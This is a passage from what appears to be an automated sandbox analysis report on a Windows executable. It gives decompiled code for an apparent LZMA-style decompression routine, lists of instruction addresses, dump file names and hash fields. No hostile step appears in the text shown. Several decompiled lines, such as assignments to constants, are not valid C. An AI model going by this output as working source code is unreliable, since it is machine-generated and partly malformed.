												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406f5b
0x00406f5b
0x00406f5f
0x00406f84
0x00406f8e
0x00000000
0x00406f61
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f72
0x00406f75
0x0040704f
0x0040704f
0x00407056
0x00407056
0x00407059
0x00407060
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00000000
0x00000000
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x00000000
0x00407048
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x00000000
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x004071ab
0x004071b1
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x004070ea
0x00000000
0x00406f5f

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
